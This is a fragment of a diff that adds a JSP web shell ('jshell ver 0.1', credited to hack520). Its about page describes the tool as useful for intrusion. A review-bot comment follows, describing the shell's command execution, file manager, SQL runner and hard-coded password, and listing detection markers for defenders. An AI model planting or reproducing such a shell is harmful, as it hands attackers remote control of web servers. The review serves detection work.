    +<% + } +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//========================================================================================== +// end of config form + } else if (action.equals("about")) { +// start of about +//========================================================================================== +%> + + + + + + + + + + +
    关于 jshell ver 0.1
    增加了显示alxea排名的功能,这对于入侵中也比较方便些,版权还是归作者的.
    hack520 by hack520 and welcome to 华夏黑客同盟
    +<% +//========================================================================================== + } +} +%> + +
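Review bot: jsp/dy.jsp is a complete web shell, and neither the commit message ("Create dy.jsp") nor the file itself says so; I would open the file with `<%-- Sample: JSP web shell (command execution, file manager, JDBC client); kept for detection work, not for deployment --%>`. In the new code `exeCmd` passes the `command` request parameter straight to `Runtime.exec`, the `filesystem` branch reads, writes, uploads and deletes whatever `curPath` names, and `DBExecute` runs caller-supplied SQL, all behind the single hard-coded `_password = "password"` check in `validate`. Because a servlet container will compile and serve any reachable `.jsp`, the sample is safer stored under a non-executable extension or inside an archive. For defenders, the literals `JFolder_By_hack520` and `jshell ver 0.1` and the request parameters `action=command` and `fsAction=` are stable markers for web-root content scans and access-log review.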